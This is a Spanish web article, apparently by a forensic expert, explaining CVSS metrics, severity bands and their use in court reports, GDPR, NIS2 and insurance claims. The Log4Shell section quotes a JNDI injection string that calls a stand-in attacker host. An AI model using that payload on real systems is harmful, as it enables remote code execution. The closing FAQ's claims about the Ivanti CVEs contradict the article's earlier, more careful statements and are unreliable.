Seguridad

CVSS (Common Vulnerability Scoring System)

Estándar abierto que asigna una puntuación de 0,0 a 10,0 a las vulnerabilidades de software según su gravedad técnica. Una puntuación de 9,0 o más recibe la calificación cualitativa «crítica»; el número por sí solo no determina el tipo de vulnerabilidad ni si hay explotación remota sin autenticación, que se comprueban en el vector CVSS y en la ficha del CVE.

21 min de lectura

CVSS 9.8: dos vulnerabilidades críticas de Ivanti EPMM. En enero de 2026, dos vulnerabilidades en Ivanti Endpoint Manager Mobile (EPMM) con puntuación CVSS 9.8 cada una (CVE-2026-1281 y CVE-2026-1340) permitían ejecutar comandos en el servidor sin necesidad de autenticación, y CERT-EU avisó de que una de ellas ya se estaba explotando en un número limitado de casos. Cuatro años antes, Log4Shell (CVE-2021-44228) alcanzó la puntuación máxima de CVSS 10.0; Google, tras corregir su estimación inicial, cifró el ecosistema afectado en más de 17.000 paquetes Java, alrededor del 4 % de Maven Central. Detrás de estas cifras hay un sistema que traduce la complejidad técnica de las vulnerabilidades en un número: el CVSS (Common Vulnerability Scoring System), que permite a un perito informático explicar a un juez, en un solo dato, la gravedad técnica de una vulnerabilidad.

Definición técnica de CVSS

El CVSS (Common Vulnerability Scoring System) es un estándar abierto y gratuito que proporciona una puntuación numérica de 0.0 a 10.0 para evaluar la gravedad de las vulnerabilidades de seguridad informática. Su primera versión fue encargada por el NIAC y desarrollada por un grupo de organizaciones de la industria; hoy lo mantiene y desarrolla el Forum of Incident Response and Security Teams (FIRST). En su versión 4.0 (publicada en noviembre de 2023), se ha convertido en el lenguaje común de la industria para comunicar la severidad de fallos de seguridad.

El CVSS usa un conjunto de métricas definidas que dan una terminología reproducible para documentar la severidad; ahora bien, la selección de los valores requiere juicio técnico, y FIRST admite que una misma vulnerabilidad pueda recibir más de una puntuación base (según producto, versión o plataforma). Es una herramienta útil en informes periciales, pero el número no convierte por sí solo la valoración en objetiva ni sustituye el análisis del caso.

Dato clave

CVSS es el estándar de facto para priorizar vulnerabilidades: lo publican como puntuación oficial el NVD del NIST y lo especifica FIRST, y en España el CCN-CERT y el INCIBE lo emplean habitualmente en sus avisos de seguridad.

El CVSS no mide el riesgo total de una vulnerabilidad para una organización concreta: mide la gravedad técnica intrinseca. El riesgo real depende además del contexto de cada organización: que sistemas están expuestos, que datos procesan y que controles compensatorios existen.


Métricas CVSS v4.0: cómo se calcula la puntuación

La versión 4.0 del CVSS introduce mejoras significativas respecto a la v3.1, incluyendo nuevos grupos de métricas y mayor granularidad. El sistema se estructura en cuatro grupos principales de métricas:

Grupo 1: Métricas Base (Base Score)

Las métricas base representan las características intrinsecas de la vulnerabilidad que no cambian con el tiempo ni dependen del entorno. Son las más importantes y las únicas obligatorias para calcular una puntuación CVSS.

MétricaValores posiblesQue mide
Vector de ataque (AV)Network, Adjacent, Local, PhysicalComo puede acceder el atacante al componente vulnerable
Complejidad de ataque (AC)Low, HighCondiciones adicionales necesarias para explotar la vulnerabilidad
Requisitos de ataque (AT)None, PresentCondiciones previas del sistema vulnerable (nuevo en v4.0)
Privilegios requeridos (PR)None, Low, HighNivel de acceso previo necesario para explotar la vulnerabilidad
Interacción del usuario (UI)None, Passive, ActiveSi la víctima debe realizar alguna acción (v4.0 distingue pasiva/activa)
Impacto en confidencialidad (VC/SC)None, Low, HighPerdida de confidencialidad en el sistema vulnerable y sistemas posteriores
Impacto en integridad (VI/SI)None, Low, HighModificación no autorizada de datos
Impacto en disponibilidad (VA/SA)None, Low, HighPerdida de acceso a recursos del sistema

Grupo 2: Métricas de Amenaza (Threat Metrics)

Reflejan el estado actual de explotación de la vulnerabilidad. En CVSS v4.0, estas métricas sustituyen a las anteriores “Temporal Metrics” de la v3.1.

MétricaValoresQue mide
Madurez del exploit (E)Not Defined, Attacked, POC, UnreportedSi existe exploit disponible y si hay ataques activos documentados

Grupo 3: Métricas Ambientales (Environmental Metrics)

Permiten ajustar la puntuación al contexto específico de una organización. Son clave para la priorizacion interna.

MétricaQue ajusta
Requisitos de confidencialidad (CR)Importancia de la confidencialidad para el activo afectado
Requisitos de integridad (IR)Importancia de la integridad para el activo
Requisitos de disponibilidad (AR)Importancia de la disponibilidad para el activo
Métricas base modificadasSobreescritura de métricas base según el entorno

Grupo 4: Métricas Suplementarias (Supplemental Metrics) - Nuevo en v4.0

MétricaQue describe
Automatizable (Automatable)Si el ataque se puede automatizar (gusano)
Recuperación (Recovery)Capacidad del sistema de recuperarse tras la explotación
Densidad de valor (Value Density)Riqueza de datos accesibles por el atacante
Esfuerzo de respuesta (Response Effort)Recursos necesarios para responder al incidente
Urgencia del proveedor (Provider Urgency)Evaluación de urgencia del propio fabricante
Seguridad física (Safety, S)Posible impacto previsible sobre la seguridad de las personas
CVSS v4.0 vs v3.1

Conviven datos CVSS v3.x y v4.0: la NVD del NIST admite ambas y muestra v4.0 cuando está disponible. Un perito forense debe registrar siempre la versión, el vector y la fuente de cada puntuación en su informe, porque las puntuaciones v3.1 y v4.0 de una misma vulnerabilidad pueden diferir.


Escala de severidad CVSS: que significa cada rango

La puntuación numérica se traduce en una escala cualitativa de severidad que facilita la comunicación con audiencias no técnicas, como jueces, abogados y directivos:

RangoSeveridadEjemplo realCVSS
0.0NingunaVulnerabilidad teórica sin impacto0.0
0.1 - 3.9BajaDivulgación limitada de información no sensible3.1
4.0 - 6.9MediaXSS reflejado que requiere interacción del usuario5.4
7.0 - 8.9AltaEternalBlue (CVE-2017-0144): ejecución remota en Windows SMB8.8
9.0 - 10.0CríticaLog4Shell (CVE-2021-44228): ejecución remota sin autenticación10.0
Regla practica para informes periciales

El CVSS no establece plazos de parcheo. La prioridad debe decidirse con la severidad y el vector, la exposición del activo, la explotación conocida (KEV/EPSS), los controles compensatorios y los requisitos normativos o contractuales aplicables. El único calendario vinculante y publicado es el que CISA impone a las agencias federales civiles estadounidenses sobre su catálogo KEV, con fecha límite vulnerabilidad por vulnerabilidad; fuera de ese ámbito, KEV funciona como señal de priorización, no como un plazo jurídico universal.


Vulnerabilidades históricas con CVSS: casos reales

El CVSS cobra significado real cuando se aplica a vulnerabilidades que han causado daños medibles. Esta tabla recoge cuatro de las vulnerabilidades más impactantes de la historia reciente, con su puntuación CVSS y consecuencias:

VulnerabilidadCVECVSSAñoVector de ataqueImpacto real
Log4ShellCVE-2021-4422810.02021Red, sin autenticación, sin interacción~17.000 paquetes Java afectados (≈4 % de Maven Central, cifra corregida por Google). Cloudflare observó el primer intento de explotación 9 minutos tras la divulgación
Ivanti EPMMCVE-2026-1281 / CVE-2026-13409.82026Red, sin autenticación, sin interacciónRCE no autenticada en el servidor EPMM; CERT-EU informó de explotación en casos limitados de una de ellas
EternalBlueCVE-2017-01448.82017Red, complejidad bajaUsado por WannaCry y NotPetya. Paralizo hospitales (NHS), logística (Maersk, 300M$ pérdidas), telecomunicaciones
HeartbleedCVE-2014-01607.52014Red, sin autenticación~17 % de los servidores SSL con certificados de CA de confianza (Netcraft). Filtración de claves privadas, credenciales y datos de memoria

Análisis detallado: Log4Shell (CVSS 10.0)

Log4Shell es el ejemplo paradigmático de lo que significa una puntuación CVSS máxima. Cada métrica base contribuyó a la puntuación perfecta de 10.0:

MétricaValorJustificación
Vector de ataqueNetworkExplotable remotamente a traves de la red
ComplejidadLowSin condiciones especiales, trivial de explotar
PrivilegiosNoneNo se necesita ningun acceso previo
Interacción usuarioNoneLa víctima no necesita hacer nada
Impacto confidencialidadHighAcceso total a datos del sistema
Impacto integridadHighModificación completa de datos y sistema
Impacto disponibilidadHighDenegación completa del servicio

La consecuencia: una aplicación Java que usara log4j-core en una versión vulnerable y registrara en el log datos controlados por el atacante podía ser comprometida remotamente con una cadena como ${jndi:ldap://atacante.invalid/exploit} (usar solo log4j-api, sin log4j-core, no bastaba para estar afectado). La puntuación CVSS 10.0 comunicaba de forma inequívoca la urgencia de parchear.

Análisis detallado: Ivanti EPMM (CVSS 9.8)

El 29 de enero de 2026, Ivanti publicó dos vulnerabilidades de inyección de código en EPMM (CVE-2026-1281 y CVE-2026-1340), ambas con CVSS 9.8 y posibilidad de ejecución remota no autenticada. El aviso de CERT-EU del 30 de enero indicó que una de ellas se había explotado en un número limitado de casos. La puntuación 9.8 (no 10.0) se debe a un único factor:

MétricaValorPor qué no fue 10.0
Vector de ataqueNetworkExplotable remotamente
ComplejidadLowTrivial de explotar
PrivilegiosNoneSin autenticación previa
Interacción usuarioNoneSin interacción
AlcanceUnchangedEl componente vulnerable y el impactado quedan bajo la misma autoridad de seguridad (no mide «propagación automática»)

La diferencia entre CVSS 9.8 y 10.0 es técnica (el alcance), pero en la práctica ambas exigen remediación prioritaria. Que una brecha se causara por una vulnerabilidad CVSS 9.8 sin parchear es un elemento técnico relevante; la diligencia, sin embargo, se valora con las circunstancias del caso (exposición, controles, tiempos), no se deduce automáticamente del número.


CVSS en investigaciones forenses: aplicación práctica

Para un perito informático, el CVSS es una herramienta fundamental que traduce complejidad técnica en un dato que jueces, abogados y aseguradoras pueden comprender. Su uso en investigaciones forenses abarca múltiples dimensiones:

Escenarios donde el CVSS es determinante

Escenario forenseRol del CVSSImpacto en el caso
Brecha de datos con negligenciaCuantifica la gravedad de la vulnerabilidad no parcheadaDetermina si la organización actuó con diligencia
Reclamación de ciberseguroAporta contexto técnico sobre si la vulnerabilidad era conocida y estaba parcheadaLa cobertura depende del condicionado de la póliza y de los hechos del siniestro; el CVSS no la decide por sí solo
Sanción AEPD/RGPDAporta contexto técnico sobre si las medidas eran «adecuadas al riesgo»Elemento a valorar con las circunstancias del art. 83 RGPD; no es un agravante ni un atenuante automático
Responsabilidad de proveedorEvalua si el software entregado cumplia estándares de seguridadCVSS alto en producto vendido puede ser incumplimiento contractual
Peritaje tras ransomwareIdentifica el vector de entrada y su gravedad técnicaUn CVSS 9.0+ sin parchear es un indicio técnico, a ponderar con exposición, controles y tiempos
El CVSS como lenguaje comun en sala

Cuando un perito declara ante un tribunal que “la vulnerabilidad explotada tenía una puntuación CVSS de 9.8 sobre 10, clasificada como crítica por el estándar internacional utilizado por FIRST, el NIST y el CCN-CERT”, proporciona al juez un dato objetivo, estandarizado e internacionalmente reconocido que trasciende la jerga técnica.


Pasos del análisis forense con CVSS

  1. Identificar la vulnerabilidad explotada

    Mediante el análisis de logs, tráfico de red, memoria y artefactos del sistema, el perito identifica el CVE específico que fue explotado. Herramientas como Nessus, OpenVAS o el análisis manual de exploits permiten correlacionar los indicadores de compromiso (IOCs) con vulnerabilidades conocidas.

  2. Obtener la puntuación CVSS oficial

    Consultar la puntuación en la National Vulnerability Database (NVD) del NIST o en la base de datos de FIRST. Registrar tanto la puntuación CVSS Base como la versión utilizada (v3.1 o v4.0). Si existen diferencias entre ambas versiones, documentar las dos.

  3. Documentar el timeline crítico

    Establecer la cronología completa: fecha de descubrimiento de la vulnerabilidad, fecha de asignación del CVE, fecha de publicación del parche por el fabricante, fecha de aviso por organismos oficiales (CISA KEV, CCN-CERT, INCIBE), y fecha del ataque. El intervalo entre la disponibilidad del parche y el ataque es la métrica clave para evaluar diligencia.

  4. Evaluar el estado de parcheado de la víctima

    Verificar las versiones de software instaladas en los sistemas comprometidos. Comprobar el historial de actualizaciones (Windows Update, apt logs, registros de gestión de parches). Documentar si existía un proceso formal de gestión de vulnerabilidades.

  5. Calcular el CVSS ambiental ajustado

    Aplicar las métricas ambientales al contexto de la organización víctima. Un hospital con datos de salud (requisito de confidencialidad alto) tendra un CVSS ambiental superior al base si la vulnerabilidad afecta a la confidencialidad. Un sistema de control industrial (requisito de disponibilidad alto) tendra un CVSS ambiental mayor si la vulnerabilidad afecta a la disponibilidad.

  6. Elaborar la conclusión pericial con CVSS como soporte

    Redactar las conclusiones apoyándose en el CVSS como una métrica más. Ejemplo: “La vulnerabilidad CVE-2026-XXXX, con puntuación CVSS 9.8 (crítica) y un parche disponible desde el DD/MM, permaneció sin aplicar 45 días pese a que el activo estaba expuesto y no constaban controles compensatorios. A criterio de este perito, y a la vista de esas circunstancias concretas, ese retraso denota una falta de diligencia en la gestión de la seguridad.” El CVSS no fija por sí solo un plazo; la valoración se sostiene en los hechos del caso.


El CVSS no es mencionado explícitamente en la legislación española, pero su relevancia jurídica es indirecta y creciente a traves de múltiples marcos normativos:

RGPD (Reglamento General de Protección de Datos)

El artículo 32 del RGPD exige “medidas técnicas y organizativas apropiadas para garantizar un nivel de seguridad adecuado al riesgo”. El CVSS proporciona la métrica objetiva para evaluar si las medidas eran “adecuadas”:

  • CVSS 9.0-10.0 sin parchear: puede ser un indicio técnico de que las medidas no eran adecuadas al riesgo conocido, a valorar con el resto de circunstancias
  • Parche disponible y no aplicado: elemento relevante, pero la AEPD pondera la intencionalidad o negligencia y las medidas aplicadas (art. 83.2 RGPD); no lo trata como agravante automático
  • Zero-day: la ausencia de un parche conocido puede reducir el reproche, aunque no exime por sí sola; se valora la diligencia global

Las resoluciones sancionadoras de la AEPD son públicas y se consultan una a una, con su número de expediente PS/NNNNN/AAAA, en su buscador de resoluciones: ahí es donde puede comprobarse qué se sancionó exactamente en cada caso de vulnerabilidad no parcheada, en lugar de manejar un umbral genérico.

Directiva NIS2 (pendiente de transposición en España)

La NIS2 exige a entidades esenciales e importantes medidas adecuadas y proporcionadas de gestión de riesgos (Art. 21), que incluyen expresamente «la gestión y divulgación de las vulnerabilidades» (art. 21.2.e). El CVSS puede usarse para priorizar, pero la Directiva no lo impone ni fija una periodicidad de pentesting. La notificación (art. 23) se activa por incidentes con impacto significativo, no por el mero hecho de que involucren una vulnerabilidad «crítica».

Código Penal: diligencia y responsabilidad

En el ámbito penal, el CVSS es útil para determinar:

Concepto legalComo contribuye el CVSS
Diligencia debidaDemuestra si la organización conocía la gravedad del riesgo
Daños informáticos (Art. 264 CP)Tipifica causar sin autorización daños graves a datos o sistemas ajenos; no regula la negligencia de la víctima al parchear
Responsabilidad del fabricanteCVSS alto en producto sin parche puede indicar defecto en seguridad
AtenuanteCVSS bajo o vulnerabilidad zero-day pueden atenuar responsabilidad de la víctima

Ciberseguros y CVSS

Las pólizas de ciberseguro cada vez incluyen cláusulas más específicas relacionadas con la gestión de vulnerabilidades:

Cláusula típica de pólizaRelación con CVSS
”Mantener sistemas actualizados con parches críticos”CVSS 9.0+ define qué es “crítico"
"Aplicar parches de seguridad en plazo razonable”CVSS determina la urgencia del plazo
”Exclusión por vulnerabilidad conocida no parcheada”La fecha del CVE y el CVSS prueban el conocimiento
Tendencia en ciberseguros

Las pólizas de ciberriesgo incorporan de forma creciente requisitos de gestión de vulnerabilidades y cláusulas de exclusión por fallo conocido y no corregido. Conviene leer el condicionado concreto de cada póliza —que es lo que obliga— en lugar de dar por supuesta una práctica común del sector: un informe pericial que acredite un CVSS 9.0+ sin parchear durante meses puede ser determinante para que la aseguradora deniegue la cobertura.


Limitaciones del CVSS y métricas complementarias

El CVSS, pese a ser el estándar más utilizado, tiene limitaciones que un perito forense debe conocer:

LimitaciónExplicaciónMétrica complementaria
No mide el riesgo realCVSS mide gravedad técnica, no probabilidad de explotaciónEPSS (Exploit Prediction Scoring System)
No considera el contextoSin métricas ambientales, ignora el entorno de la organizaciónSSVC (Stakeholder-Specific Vulnerability Categorization) de CISA
Puntuación estáticaLa puntuación base no cambia, aunque aparezcan exploitsCVSS Threat Metrics + CISA KEV
Fatiga de alertasDemasiadas vulnerabilidades “críticas” complican la priorizacionEPSS filtra vulnerabilidades con alta probabilidad de explotación real

EPSS (Exploit Prediction Scoring System): Desarrollado por FIRST (el mismo organismo detras de CVSS), EPSS calcula la probabilidad de que una vulnerabilidad sea explotada en los próximos 30 días, en una escala de 0 a 1. Un perito forense puede combinar CVSS (gravedad) con EPSS (probabilidad) para un análisis de riesgo más completo en su informe pericial.


Herramientas para calcular y consultar CVSS

HerramientaFunciónAcceso
NVD (NIST)Registros de CVE con puntuaciones CVSS del NIST, CNA o ADP cuando están disponibles (desde 2026, enriquecimiento por prioridad)Gratuito: nvd.nist.gov
FIRST CVSS CalculatorCalculadora oficial interactiva para CVSS v4.0 y v3.1Gratuito: first.org/cvss/calculator
CVE.orgPrograma CVE (gobernado por el CVE Board; MITRE ejerce de secretaría)Gratuito: cve.org
CISA KEVCatálogo de vulnerabilidades explotadas activamenteGratuito: cisa.gov/known-exploited-vulnerabilities
Nessus / OpenVASEscáneres de vulnerabilidades que calculan CVSS automáticamenteComercial / Open-source
CCN-CERT (España)Avisos de seguridad con puntuaciones CVSS para administración publicaGratuito: ccn-cert.cni.es

Preguntas frecuentes

¿Qué significa una puntuación CVSS de 9.8?

Una puntuación CVSS de 9.8 recibe la calificación crítica. Un 9.8 se obtiene habitualmente cuando el vector es Network, con complejidad baja, sin autenticación ni privilegios previos y sin interacción del usuario, y con impacto alto en confidencialidad, integridad y disponibilidad. Ahora bien, esas características se leen en el vector CVSS de cada vulnerabilidad —varias combinaciones distintas pueden producir el mismo número—, no se deducen del 9.8 por sí solo.

La razón por la que alcanza 9.8 y no 10.0 suele ser el parámetro «Alcance» (Scope) de la versión 3.1: en S:U el componente vulnerable y el impactado están bajo la misma autoridad de seguridad, mientras que en un 10.0 como Log4Shell (S:C) el impacto alcanza a componentes bajo otra autoridad. La versión 4.0 sustituyó esa métrica única por el impacto diferenciado en el sistema vulnerable y en los sistemas posteriores.

Ejemplos recientes con CVSS 9.8: las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 en Ivanti EPMM, y CVE-2024-21762 en FortiOS, incluida en el catálogo KEV de CISA y marcada con uso conocido en campañas de ransomware.

¿Cómo se calcula la puntuación CVSS?

El cálculo en CVSS v3.1 combina las métricas base mediante una fórmula (CVSS v4.0 cambió el método a macrovectores e interpolación y eliminó la métrica única Scope). El proceso en v3.1 es el siguiente:

  1. Evaluar cada métrica base: Para cada una de las 8+ métricas (vector de ataque, complejidad, privilegios, interacción del usuario, impacto en CIA), se selecciona el valor que describe la vulnerabilidad
  2. Asignar pesos numéricos: Cada valor tiene un peso predefinido por el estándar (por ejemplo, AV:Network = 0.85, AV:Local = 0.55)
  3. Calcular sub-puntuaciones: Se combinan los pesos de explotabilidad (AV, AC, PR, UI) y los de impacto (C, I, A) en sub-puntuaciones
  4. Aplicar la fórmula final: La fórmula combina las sub-puntuaciones con un factor de ajuste por alcance (Scope), produciendo un número entre 0.0 y 10.0
  5. Redondear al decimal superior: El resultado se redondea a un decimal

En la practica, la mayoría de los profesionales utilizan la calculadora oficial de FIRST o las puntuaciones ya asignadas por el NIST en la NVD, en lugar de calcular manualmente. Lo importante para un perito forense es entender que significa cada métrica y como impacta en la puntuación final, para poder explicarlo ante un tribunal.

¿Por qué es importante el CVSS en un informe pericial forense?

El CVSS aporta cuatro valores fundamentales a un informe pericial:

  1. Objetividad: La puntuación es calculada mediante un estándar internacional público, no es una opinion subjetiva del perito. Cualquier otro profesional puede verificar independientemente la puntuación
  2. Universalidad: El CVSS es comprendido por la industria de ciberseguridad a nivel mundial. Cuando un perito cita CVSS 9.8, cualquier experto en cualquier país entiende exactamente la gravedad
  3. Comprensibilidad judicial: Un juez sin conocimientos técnicos puede entender “9.8 sobre 10, clasificado como crítico”. Es infinitamente más claro que explicar vectores de ataque, buffers overflow o inyecciones de código
  4. Determinación de diligencia: El CVSS, combinado con la fecha de publicación del parche y la fecha del ataque, aporta un elemento técnico objetivo para valorar la diligencia de la organización víctima, que se pondera con el resto de circunstancias del caso (exposición, controles y tiempos) y no se deduce automáticamente del número

El CVSS entra en un procedimiento como soporte técnico del razonamiento pericial, no como prueba en sí: sirve para explicar por qué una vulnerabilidad debió corregirse antes, en reclamaciones de ciberseguro, en expedientes por brechas de datos y en procedimientos por daños informáticos donde se discute la diligencia en la protección de los sistemas.


Conceptos relacionados

  • CVE (Vulnerabilidades) - El sistema de identificación de vulnerabilidades cuya gravedad mide el CVSS
  • Zero-Day - Vulnerabilidades desconocidas o sin corrección disponible; su severidad base depende de las características técnicas del vector CVSS, no de la ausencia de parche
  • Pentesting - Los informes de pentesting clasifican hallazgos por puntuación CVSS
  • IOCs (Indicadores de Compromiso) - Los IOCs se correlacionan con CVEs que tienen puntuaciones CVSS asignadas
  • Análisis Forense Digital - Disciplina donde el CVSS contextualiza la gravedad de las vulnerabilidades explotadas

¿Sabrías qué demostrar si mañana te lo piden?

La diferencia entre un incidente gestionado y uno sancionado suele estar en qué quedó registrado, no en qué se hizo.

Referencias y fuentes

  1. FIRST - “Common Vulnerability Scoring System v4.0 Specification”. first.org/cvss/v4.0/specification-document

  2. NIST - “National Vulnerability Database (NVD)”. nvd.nist.gov

  3. CVE-2026-1281 y CVE-2026-1340 (Ivanti EPMM, CVSS 9.8, publicadas el 29 de enero de 2026) — ficha CVE-2026-1281 en NVD. En el catálogo KEV de CISA: CVE-2026-1281 añadida el 29-ene-2026 (vence 1-feb) y CVE-2026-1340 añadida el 8-abr-2026 (vence 11-abr)

  4. Apache Foundation - “Apache Log4j Security Vulnerabilities - CVE-2021-44228, CVSS 10.0”. logging.apache.org/log4j/2.x/security

  5. Cloudflare — «Exploitation of CVE-2021-44228 before public disclosure…». blog.cloudflare.com — primer intento de explotación de Log4Shell nueve minutos tras la divulgación.

  6. CISA - “Known Exploited Vulnerabilities Catalog”. cisa.gov/known-exploited-vulnerabilities-catalog

  7. CCN-CERT - “Avisos de seguridad del Centro Criptológico Nacional”. ccn-cert.cni.es

  8. Reglamento (UE) 2016/679 (RGPD) — art. 32, seguridad del tratamiento.

  9. Directiva (UE) 2022/2555 (NIS2) — art. 21, medidas de gestión de riesgos de ciberseguridad.

  10. FIRST - “Exploit Prediction Scoring System (EPSS)”. first.org/epss

  11. Maersk — pérdidas de unos 300 millones de dólares por NotPetya, que se propagó explotando EternalBlue (CVE-2017-0144, CVSS v3.1 8.8) sin parchear. Comunicado corporativo, 2017.


Última actualización: Febrero 2026 Categoría: Seguridad Código: SEG-022

Preguntas Frecuentes

¿Qué significa una puntuación CVSS de 9.8?

Una puntuación CVSS de 9.8 sobre 10 indica una vulnerabilidad crítica que permite ejecución remota de código sin autenticación previa, a través de la red, sin interacción del usuario. Ejemplo: las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 en Ivanti EPMM, explotadas activamente desde enero de 2026, tienen CVSS 9.8.

¿Cómo se calcula la puntuación CVSS?

CVSS v4.0 evalúa múltiples métricas: vector de ataque (red/local), complejidad, requisitos de ataque, privilegios requeridos, interacción del usuario e impacto en confidencialidad, integridad y disponibilidad, tanto del sistema vulnerable como de los sistemas posteriores. La combinación genera una puntuación de 0 a 10: Bajo (0.1-3.9), Medio (4.0-6.9), Alto (7.0-8.9), Crítico (9.0-10.0).

¿Por qué es importante el CVSS en un informe pericial forense?

El CVSS permite al perito informático cuantificar objetivamente la gravedad de la vulnerabilidad explotada en un incidente. En informes periciales para tribunales, el CVSS proporciona una métrica estándar internacional que los jueces pueden entender: 'la vulnerabilidad explotada tenía una gravedad de 9.8 sobre 10, clasificada como crítica por el estándar internacional CVSS'.

¿Necesitas un peritaje forense?

Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.

Solicitar Consulta Gratuita
Jonathan Izquierdo

Jonathan Izquierdo · Perito Forense

+15 años experiencia · AWS Certified

WhatsApp